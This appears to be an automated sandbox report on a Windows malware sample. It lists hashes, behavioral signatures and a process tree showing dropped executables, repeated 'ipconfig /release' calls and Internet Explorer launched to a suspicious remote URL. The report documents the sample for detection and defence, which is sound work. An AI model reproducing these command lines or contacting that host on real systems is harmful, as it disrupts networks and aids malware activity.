Analysis

max time kernel: 150s
max time network: 138s
platform: windows7_x64
resource: win7-20241010-en
resource tags: arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
submitted: 27/01/2025, 20:34
Static task: static1

Behavioral task: behavioral1
  Sample: JaffaCakes118_437309d104ca341348f98d56425358fc.exe
  Resource: win7-20241010-en

Behavioral task: behavioral2
  Sample: JaffaCakes118_437309d104ca341348f98d56425358fc.exe
  Resource: win10v2004-20241007-en
General

Target: JaffaCakes118_437309d104ca341348f98d56425358fc.exe
Size: 361KB
MD5: 437309d104ca341348f98d56425358fc
SHA1: 41494a4c7d122570ea1d14f1ba9605b0242134f5
SHA256: 6d131c347e95abc7aedf92773ee5b94593279c62bf02528365544a663bf0826c
SHA512: 8e140990002713aacdb5a5c42e2cf39c911f0660b75ec9a7da6ebc3e29a1dd56018d3dc3c2150e4e8ecf176a33caafb603b830cad57a7da7b482d405f5416973
SSDEEP: 6144:WflfAsiL4lIJjiJcbI03GBc3ucY5DCSjX:WflfAsiVGjSGecvX
Malware Config

Signatures

Executes dropped EXE (64 IoCs)
Loads dropped DLL (59 IoCs)
System Location Discovery: System Language Discovery (1 TTP, 22 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Gathers network information (2 TTPs, 19 IoCs)
Uses a command-line utility to view network configuration.
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Suspicious behavior: LoadsDriver (20 IoCs)
Suspicious use of AdjustPrivilegeToken (19 IoCs)
Suspicious use of FindShellTrayWindow (1 IoC)
  PID 2176  iexplore.exe

Suspicious use of SetWindowsHookEx (6 IoCs)
  PID 2176  iexplore.exe
  PID 2176  iexplore.exe
  PID 2148  IEXPLORE.EXE
  PID 2148  IEXPLORE.EXE
  PID 2148  IEXPLORE.EXE
  PID 2148  IEXPLORE.EXE
Suspicious use of WriteProcessMemory (64 IoCs)
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Temp\ojgbvtnlgaysqkfd.exeC:\Temp\ojgbvtnlgaysqkfd.exe run2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:636 -
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\pkecwupjey.exe ups_run3⤵
- Executes dropped EXE
PID:2676 -
C:\Temp\pkecwupjey.exeC:\Temp\pkecwupjey.exe ups_run4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release5⤵
- Executes dropped EXE
PID:2840 -
C:\windows\system32\ipconfig.exeC:\windows\system32\ipconfig.exe /release6⤵
- Gathers network information
PID:2780
-
-
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\i_pkecwupjey.exe ups_ins3⤵
- Executes dropped EXE
PID:2732 -
C:\Temp\i_pkecwupjey.exeC:\Temp\i_pkecwupjey.exe ups_ins4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2120
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\lgeysqlidx.exe ups_run3⤵
- Executes dropped EXE
PID:2708 -
C:\Temp\lgeysqlidx.exeC:\Temp\lgeysqlidx.exe ups_run4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1040 -
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release5⤵
- Executes dropped EXE
PID:2852 -
C:\windows\system32\ipconfig.exeC:\windows\system32\ipconfig.exe /release6⤵
- Gathers network information
PID:1980
-
-
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\i_lgeysqlidx.exe ups_ins3⤵
- Executes dropped EXE
PID:236 -
C:\Temp\i_lgeysqlidx.exeC:\Temp\i_lgeysqlidx.exe ups_ins4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2248
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\cxrpkhcwuo.exe ups_run3⤵
- Executes dropped EXE
PID:1584 -
C:\Temp\cxrpkhcwuo.exeC:\Temp\cxrpkhcwuo.exe ups_run4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release5⤵
- Executes dropped EXE
PID:2536 -
C:\windows\system32\ipconfig.exeC:\windows\system32\ipconfig.exe /release6⤵
- Gathers network information
PID:2124
-
-
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\i_cxrpkhcwuo.exe ups_ins3⤵
- Executes dropped EXE
PID:788 -
C:\Temp\i_cxrpkhcwuo.exeC:\Temp\i_cxrpkhcwuo.exe ups_ins4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2596
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\wupjhbztom.exe ups_run3⤵
- Executes dropped EXE
PID:2440 -
C:\Temp\wupjhbztom.exeC:\Temp\wupjhbztom.exe ups_run4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release5⤵
- Executes dropped EXE
PID:1236 -
C:\windows\system32\ipconfig.exeC:\windows\system32\ipconfig.exe /release6⤵
- Gathers network information
PID:1792
-
-
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\i_wupjhbztom.exe ups_ins3⤵
- Executes dropped EXE
PID:2640 -
C:\Temp\i_wupjhbztom.exeC:\Temp\i_wupjhbztom.exe ups_ins4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1624
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\wqojgbvtnl.exe ups_run3⤵
- Executes dropped EXE
PID:2772 -
C:\Temp\wqojgbvtnl.exeC:\Temp\wqojgbvtnl.exe ups_run4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2604 -
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release5⤵
- Executes dropped EXE
PID:2800 -
C:\windows\system32\ipconfig.exeC:\windows\system32\ipconfig.exe /release6⤵
- Gathers network information
PID:1700
-
-
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\i_wqojgbvtnl.exe ups_ins3⤵
- Executes dropped EXE
PID:2836 -
C:\Temp\i_wqojgbvtnl.exeC:\Temp\i_wqojgbvtnl.exe ups_ins4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2684
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\nlfaysqkfc.exe ups_run3⤵
- Executes dropped EXE
PID:1836 -
C:\Temp\nlfaysqkfc.exeC:\Temp\nlfaysqkfc.exe ups_run4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2068 -
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release5⤵
- Executes dropped EXE
PID:2692 -
C:\windows\system32\ipconfig.exeC:\windows\system32\ipconfig.exe /release6⤵
- Gathers network information
PID:1664
-
-
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\i_nlfaysqkfc.exe ups_ins3⤵
- Executes dropped EXE
PID:1496 -
C:\Temp\i_nlfaysqkfc.exeC:\Temp\i_nlfaysqkfc.exe ups_ins4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2308
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\caupmhfzur.exe ups_run3⤵
- Executes dropped EXE
PID:1560 -
C:\Temp\caupmhfzur.exeC:\Temp\caupmhfzur.exe ups_run4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1992 -
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release5⤵
- Executes dropped EXE
PID:576 -
C:\windows\system32\ipconfig.exeC:\windows\system32\ipconfig.exe /release6⤵
- Gathers network information
PID:2092
-
-
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\i_caupmhfzur.exe ups_ins3⤵
- Executes dropped EXE
PID:1760 -
C:\Temp\i_caupmhfzur.exeC:\Temp\i_caupmhfzur.exe ups_ins4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\rmgeywrljd.exe ups_run3⤵
- Executes dropped EXE
PID:2096 -
C:\Temp\rmgeywrljd.exeC:\Temp\rmgeywrljd.exe ups_run4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1656 -
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release5⤵
- Executes dropped EXE
PID:840 -
C:\windows\system32\ipconfig.exeC:\windows\system32\ipconfig.exe /release6⤵
- Gathers network information
PID:984
-
-
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\i_rmgeywrljd.exe ups_ins3⤵
- Executes dropped EXE
PID:2476 -
C:\Temp\i_rmgeywrljd.exeC:\Temp\i_rmgeywrljd.exe ups_ins4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2100
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\olgeysqlid.exe ups_run3⤵
- Executes dropped EXE
PID:2212 -
C:\Temp\olgeysqlid.exeC:\Temp\olgeysqlid.exe ups_run4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2424 -
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release5⤵
- Executes dropped EXE
PID:2408 -
C:\windows\system32\ipconfig.exeC:\windows\system32\ipconfig.exe /release6⤵
- Gathers network information
PID:2452
-
-
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\i_olgeysqlid.exe ups_ins3⤵
- Executes dropped EXE
PID:2160 -
C:\Temp\i_olgeysqlid.exeC:\Temp\i_olgeysqlid.exe ups_ins4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2356
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\vsnhfzxsmk.exe ups_run3⤵
- Executes dropped EXE
PID:1724 -
C:\Temp\vsnhfzxsmk.exeC:\Temp\vsnhfzxsmk.exe ups_run4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3028 -
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release5⤵
- Executes dropped EXE
PID:2900 -
C:\windows\system32\ipconfig.exeC:\windows\system32\ipconfig.exe /release6⤵
- Gathers network information
PID:2820
-
-
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\i_vsnhfzxsmk.exe ups_ins3⤵
- Executes dropped EXE
PID:436 -
C:\Temp\i_vsnhfzxsmk.exeC:\Temp\i_vsnhfzxsmk.exe ups_ins4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2144
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\usmhezxrmj.exe ups_run3⤵
- Executes dropped EXE
PID:2972 -
C:\Temp\usmhezxrmj.exeC:\Temp\usmhezxrmj.exe ups_run4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2732 -
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release5⤵
- Executes dropped EXE
PID:268 -
C:\windows\system32\ipconfig.exeC:\windows\system32\ipconfig.exe /release6⤵
- Gathers network information
PID:2220
-
-
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\i_usmhezxrmj.exe ups_ins3⤵
- Executes dropped EXE
PID:2956 -
C:\Temp\i_usmhezxrmj.exeC:\Temp\i_usmhezxrmj.exe ups_ins4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1736
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\ojhbztolge.exe ups_run3⤵
- Executes dropped EXE
PID:2984 -
C:\Temp\ojhbztolge.exeC:\Temp\ojhbztolge.exe ups_run4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2384 -
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release5⤵
- Executes dropped EXE
PID:2584 -
C:\windows\system32\ipconfig.exeC:\windows\system32\ipconfig.exe /release6⤵
- Gathers network information
PID:1176
-
-
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\i_ojhbztolge.exe ups_ins3⤵
- Executes dropped EXE
PID:1508 -
C:\Temp\i_ojhbztolge.exeC:\Temp\i_ojhbztolge.exe ups_ins4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2824
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\dysqlidxvp.exe ups_run3⤵
- Executes dropped EXE
PID:2084 -
C:\Temp\dysqlidxvp.exeC:\Temp\dysqlidxvp.exe ups_run4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1760 -
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release5⤵
- Executes dropped EXE
PID:1900 -
C:\windows\system32\ipconfig.exeC:\windows\system32\ipconfig.exe /release6⤵
- Gathers network information
PID:2912
-
-
-
-
-
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\i_dysqlidxvp.exe ups_ins3⤵PID:1072
-
C:\Temp\i_dysqlidxvp.exeC:\Temp\i_dysqlidxvp.exe ups_ins4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
-
C:\temp\CreateProcess.exe (tree level 3)
Command line: C:\temp\CreateProcess.exe C:\Temp\axsqkfcxup.exe ups_run
PID:964

C:\Temp\axsqkfcxup.exe (tree level 4)
Command line: C:\Temp\axsqkfcxup.exe ups_run
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2204

C:\temp\CreateProcess.exe (tree level 5)
Command line: C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
PID:2100

C:\windows\system32\ipconfig.exe (tree level 6)
Command line: C:\windows\system32\ipconfig.exe /release
- Gathers network information
PID:2236

C:\temp\CreateProcess.exe (tree level 3)
Command line: C:\temp\CreateProcess.exe C:\Temp\i_axsqkfcxup.exe ups_ins
PID:980

C:\Temp\i_axsqkfcxup.exe (tree level 4)
Command line: C:\Temp\i_axsqkfcxup.exe ups_ins
- Suspicious use of AdjustPrivilegeToken
PID:2516

C:\temp\CreateProcess.exe (tree level 3)
Command line: C:\temp\CreateProcess.exe C:\Temp\usmkezwrpj.exe ups_run
PID:2636

C:\Temp\usmkezwrpj.exe (tree level 4)
Command line: C:\Temp\usmkezwrpj.exe ups_run
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1956

C:\temp\CreateProcess.exe (tree level 5)
Command line: C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
PID:2112

C:\windows\system32\ipconfig.exe (tree level 6)
Command line: C:\windows\system32\ipconfig.exe /release
- Gathers network information
PID:2280

C:\temp\CreateProcess.exe (tree level 3)
Command line: C:\temp\CreateProcess.exe C:\Temp\i_usmkezwrpj.exe ups_ins
PID:280

C:\Temp\i_usmkezwrpj.exe (tree level 4)
Command line: C:\Temp\i_usmkezwrpj.exe ups_ins
- Suspicious use of AdjustPrivilegeToken
PID:2876

C:\temp\CreateProcess.exe (tree level 3)
Command line: C:\temp\CreateProcess.exe C:\Temp\trmgeywqlj.exe ups_run
PID:1840

C:\Temp\trmgeywqlj.exe (tree level 4)
Command line: C:\Temp\trmgeywqlj.exe ups_run
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2560

C:\temp\CreateProcess.exe (tree level 5)
Command line: C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
PID:960

C:\windows\system32\ipconfig.exe (tree level 6)
Command line: C:\windows\system32\ipconfig.exe /release
- Gathers network information
PID:2032

C:\temp\CreateProcess.exe (tree level 3)
Command line: C:\temp\CreateProcess.exe C:\Temp\i_trmgeywqlj.exe ups_ins
PID:3060

C:\Temp\i_trmgeywqlj.exe (tree level 4)
Command line: C:\Temp\i_trmgeywqlj.exe ups_ins
- Suspicious use of AdjustPrivilegeToken
PID:1772

C:\temp\CreateProcess.exe (tree level 3)
Command line: C:\temp\CreateProcess.exe C:\Temp\wqlidbvqni.exe ups_run
PID:2012

C:\Temp\wqlidbvqni.exe (tree level 4)
Command line: C:\Temp\wqlidbvqni.exe ups_run
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2024

C:\temp\CreateProcess.exe (tree level 5)
Command line: C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
PID:2040

C:\windows\system32\ipconfig.exe (tree level 6)
Command line: C:\windows\system32\ipconfig.exe /release
- Gathers network information
PID:2276

C:\temp\CreateProcess.exe (tree level 3)
Command line: C:\temp\CreateProcess.exe C:\Temp\i_wqlidbvqni.exe ups_ins
PID:1740

C:\Temp\i_wqlidbvqni.exe (tree level 4)
Command line: C:\Temp\i_wqlidbvqni.exe ups_ins
- Suspicious use of AdjustPrivilegeToken
PID:1028

C:\temp\CreateProcess.exe (tree level 3)
Command line: C:\temp\CreateProcess.exe C:\Temp\ysnlfdxspk.exe ups_run
PID:1764

C:\Temp\ysnlfdxspk.exe (tree level 4)
Command line: C:\Temp\ysnlfdxspk.exe ups_run
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2472

C:\temp\CreateProcess.exe (tree level 5)
Command line: C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
PID:1964

C:\windows\system32\ipconfig.exe (tree level 6)
Command line: C:\windows\system32\ipconfig.exe /release
- Gathers network information
PID:2752

C:\temp\CreateProcess.exe (tree level 3)
Command line: C:\temp\CreateProcess.exe C:\Temp\i_ysnlfdxspk.exe ups_ins
PID:2616

C:\Temp\i_ysnlfdxspk.exe (tree level 4)
Command line: C:\Temp\i_ysnlfdxspk.exe ups_ins
- Suspicious use of AdjustPrivilegeToken
PID:2272

C:\temp\CreateProcess.exe (tree level 3)
Command line: C:\temp\CreateProcess.exe C:\Temp\upnhczusmg.exe ups_run
PID:236

C:\Temp\upnhczusmg.exe (tree level 4)
Command line: C:\Temp\upnhczusmg.exe ups_run
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1692

C:\temp\CreateProcess.exe (tree level 5)
Command line: C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
PID:2896

C:\windows\system32\ipconfig.exe (tree level 6)
Command line: C:\windows\system32\ipconfig.exe /release
- Gathers network information
PID:1728

C:\temp\CreateProcess.exe (tree level 3)
Command line: C:\temp\CreateProcess.exe C:\Temp\i_upnhczusmg.exe ups_ins
PID:2316

C:\Temp\i_upnhczusmg.exe (tree level 4)
Command line: C:\Temp\i_upnhczusmg.exe ups_ins
- Suspicious use of AdjustPrivilegeToken
PID:2416

C:\Program Files\Internet Explorer\iexplore.exe (tree level 2)
Command line: "C:\Program Files\Internet Explorer\iexplore.exe" http://xytets.com:2345/t.asp?os=home
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2176

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE (tree level 3)
Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2176 CREDAT:275457 /prefetch:2
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2148

Network
MITRE ATT&CK Enterprise v15
Downloads